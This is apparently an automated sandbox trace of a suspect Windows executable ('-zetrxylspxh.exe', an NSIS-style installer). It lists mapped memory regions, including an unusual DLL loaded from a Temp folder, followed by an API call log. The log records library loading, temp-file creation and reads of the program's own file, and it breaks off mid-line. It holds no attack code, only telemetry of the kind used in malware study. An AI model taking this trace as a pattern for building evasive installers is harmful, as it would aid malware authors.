Region: id = 8137 start_va = 0x76110000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76124f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8138 start_va = 0x74a10000 end_va = 0x74a2dfff monitored = 0 entry_point = 0x74a1b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8139 start_va = 0x74a00000 end_va = 0x74a09fff monitored = 0 entry_point = 0x74a02a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8140 start_va = 0x760b0000 end_va = 0x76107fff monitored = 0 entry_point = 0x760f25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8141 start_va = 0x75400000 end_va = 0x75443fff monitored = 0 entry_point = 0x75419d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8142 start_va = 0x77620000 end_va = 0x7769afff monitored = 0 entry_point = 0x7763e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8143 start_va = 0x759b0000 end_va = 0x759f4fff monitored = 0 entry_point = 0x759cde90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8144 start_va = 0x77a50000 end_va = 0x77a5bfff monitored = 0 entry_point = 0x77a53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 8145 start_va = 0x76020000 end_va = 0x760acfff monitored = 0 entry_point = 0x76069b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 8146 start_va = 0x75ec0000 end_va = 0x75f03fff monitored = 0 entry_point = 0x75ec7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 8147 start_va = 0x75f10000 end_va = 0x75f1efff monitored = 0 entry_point = 0x75f12e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 8148 start_va = 0x74e70000 end_va = 0x74f5afff monitored = 0 entry_point = 0x74ead650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 8149 start_va = 0x72170000 end_va = 0x72201fff monitored = 0 entry_point = 0x7217dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 8150 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8151 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 8152 start_va = 0x779d0000 end_va = 0x779fafff monitored = 0 entry_point = 0x779d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8153 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8154 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8155 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 8156 start_va = 0xab0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 8157 start_va = 0x1eb0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 8158 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 8159 start_va = 0x1eb0000 end_va = 0x1f40fff monitored = 0 entry_point = 0x1ee8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 8160 start_va = 0x1fa0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 8161 start_va = 0x720f0000 end_va = 0x72164fff monitored = 0 entry_point = 0x72129a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 8162 start_va = 0x1fb0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 8163 start_va = 0x720d0000 end_va = 0x720e8fff monitored = 0 entry_point = 0x720d47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 8164 start_va = 0x74a30000 end_va = 0x74e3afff monitored = 0 entry_point = 0x74a5adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 8165 start_va = 0x729a0000 end_va = 0x72aeafff monitored = 0 entry_point = 0x72a01660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 8166 start_va = 0x77a60000 end_va = 0x77af1fff monitored = 0 entry_point = 0x77a98cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 8167 start_va = 0x720b0000 end_va = 0x720ccfff monitored = 0 entry_point = 0x720b3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 8168 start_va = 0x72050000 end_va = 0x720a3fff monitored = 0 entry_point = 0x7206dc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 8169 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 8170 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8171 start_va = 0x77780000 end_va = 0x77803fff monitored = 0 entry_point = 0x777a6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 8172 start_va = 0x72040000 end_va = 0x72047fff monitored = 0 entry_point = 0x720417b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8173 start_va = 0x72030000 end_va = 0x72035fff monitored = 0 entry_point = 0x72031570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 8174 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 8175 start_va = 0x2100000 end_va = 0x2436fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8176 start_va = 0x1eb0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 8177 start_va = 0x1fb0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 8178 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 8179 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 8180 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 8181 start_va = 0x1ef0000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 8182 start_va = 0x2440000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 8183 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 8184 start_va = 0x580000 end_va = 0x583fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 8185 start_va = 0x1f30000 end_va = 0x1f47fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db") Region: id = 8186 start_va = 0x1f50000 end_va = 0x1f50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f50000" filename = "" Region: id = 8187 start_va = 0x71fa0000 end_va = 0x72020fff monitored = 0 entry_point = 0x71fa6310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 8188 start_va = 0x71f80000 end_va = 0x71f95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 8189 start_va = 0x71f40000 end_va = 0x71f70fff monitored = 0 entry_point = 0x71f522d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 8190 start_va = 0x580000 end_va = 0x583fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8191 start_va = 0x75a20000 end_va = 0x75b3efff monitored = 0 entry_point = 0x75a65980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8192 start_va = 0x1f60000 end_va = 0x1f60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 8193 start_va = 0x2540000 end_va = 0x25fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 8194 start_va = 0x1f60000 end_va = 0x1f63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 8195 start_va = 0x1f70000 end_va = 0x1f71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f70000" filename = "" Region: id = 8196 start_va = 0x1f80000 end_va = 0x1f80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 8197 start_va = 0x1f90000 end_va = 0x1f94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 8198 start_va = 0x20b0000 end_va = 0x20bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 8199 start_va = 0x71f30000 end_va = 0x71f3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "akepwc.dll" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsce967.tmp\\akepwc.dll") Region: id = 8200 start_va = 0x20b0000 end_va = 0x20b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 8201 start_va = 0x775c0000 end_va = 0x7761efff monitored = 0 entry_point = 0x775c4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 8202 start_va = 0x71d20000 end_va = 0x71f2cfff monitored = 0 entry_point = 0x71e0acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 8203 start_va = 0x71d10000 end_va = 0x71d17fff monitored = 0 entry_point = 0x71d11740 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 8204 start_va = 0x72210000 end_va = 0x7225efff monitored = 0 entry_point = 0x7221d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 8205 start_va = 0x2600000 end_va = 0xe4bcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 8206 start_va = 0xe4c0000 end_va = 0xe4f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e4c0000" filename = "" Region: id = 8223 start_va = 0xe500000 end_va = 0xe678fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e500000" filename = "" Region: id = 8224 start_va = 0xe680000 end_va = 0xe7fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e680000" filename = "" Region: id = 8226 start_va = 0xe500000 end_va = 0xe678fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e500000" filename = "" Region: id = 8227 start_va = 0xe680000 end_va = 0xe7fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e680000" filename = "" Region: id = 8228 start_va = 0xe500000 end_va = 0xe678fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e500000" filename = "" Region: id = 8229 start_va = 0xe680000 end_va = 0xe7fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e680000" filename = "" Region: id = 8230 start_va = 0xe500000 end_va = 0xe678fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e500000" filename = "" Region: id = 8231 start_va = 0xe680000 end_va = 0xe7fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e680000" filename = "" Region: id = 8232 start_va = 0xe500000 end_va = 0xe678fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e500000" filename = "" Region: id = 8233 start_va = 0xe680000 end_va = 0xe7fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e680000" filename = "" Thread: id = 288 os_tid = 0xca8 [0269.095] SetErrorMode (uMode=0x8001) returned 0x0 [0269.104] GetVersion () returned 0x23f00206 [0269.104] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x776a0000 [0269.104] GetProcAddress (hModule=0x776a0000, lpProcName="SetDefaultDllDirectories") returned 0x75356270 [0269.105] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0269.105] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.113] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0269.114] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x720f0000 [0269.220] lstrlenA (lpString="UXTHEME") returned 7 [0269.220] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.220] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0269.220] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x720d0000 [0269.339] lstrlenA (lpString="USERENV") returned 7 [0269.339] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.339] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0269.339] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x74a30000 [0269.349] lstrlenA (lpString="SETUPAPI") returned 8 [0269.349] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.349] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\APPHELP.dll") returned 12 [0269.349] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x74960000 [0269.349] lstrlenA (lpString="APPHELP") returned 7 [0269.349] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.349] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0269.349] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x729a0000 [0269.366] lstrlenA (lpString="PROPSYS") returned 7 [0269.366] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.366] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0269.366] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x720b0000 [0269.376] lstrlenA (lpString="DWMAPI") returned 6 [0269.376] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.376] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0269.377] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x74a00000 [0269.377] lstrlenA (lpString="CRYPTBASE") returned 9 [0269.377] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.377] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\OLEACC.dll") returned 11 [0269.377] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x72050000 [0269.398] lstrlenA (lpString="OLEACC") returned 6 [0269.398] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.398] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0269.398] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x77780000 [0269.443] lstrlenA (lpString="CLBCATQ") returned 7 [0269.443] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0269.443] GetSystemDirectoryA (in: lpBuffer=0x19fcb4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.443] wsprintfA (in: param_1=0x19fcc7, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0269.443] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x72040000 [0269.456] GetProcAddress (hModule=0x72040000, lpProcName="GetFileVersionInfoA") returned 0x72041490 [0269.456] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0269.456] GetSystemDirectoryA (in: lpBuffer=0x19fcb4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.456] wsprintfA (in: param_1=0x19fcc7, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0269.456] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x72030000 [0269.463] GetProcAddress (hModule=0x72030000, lpProcName="SHGetFolderPathA") returned 0x72031300 [0269.463] InitCommonControls () [0269.466] OleInitialize (pvReserved=0x0) returned 0x0 [0269.501] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fe24, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x19fe24) returned 0x1 [0269.877] lstrcpynA (in: lpString1=0x42e420, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0269.885] GetCommandLineA () returned="\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" " [0269.885] lstrcpynA (in: lpString1=0x434000, lpString2="\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" ") returned="\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" " [0269.885] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0269.886] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x435400 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0269.893] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0269.894] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0269.894] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0269.894] GetLastError () returned 0xb7 [0269.894] GetTickCount () returned 0xe85c [0269.894] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsw", uUnique=0x0, lpTempFileName=0x435000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nswE85C.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nswe85c.tmp")) returned 0xe85c [0269.897] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nswE85C.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nswe85c.tmp")) returned 1 [0269.898] GetTickCount () returned 0xe85c [0269.898] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x435c00, nSize=0x400 | out: lpFilename="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe")) returned 0x31 [0269.898] GetFileAttributesA (lpFileName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe")) returned 0x20 [0269.898] CreateFileA (lpFileName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x1ec [0269.898] lstrcpynA (in: lpString1=0x434c00, lpString2="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", iMaxLength=1024 | out: lpString1="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe") returned="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" [0269.898] lstrlenA (lpString="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe") returned 49 [0269.899] lstrcpynA (in: lpString1=0x436000, lpString2="-zetrxylspxh.exe", iMaxLength=1024 | out: lpString1="-zetrxylspxh.exe") returned="-zetrxylspxh.exe" [0269.899] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41365 [0269.899] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.900] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.900] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, 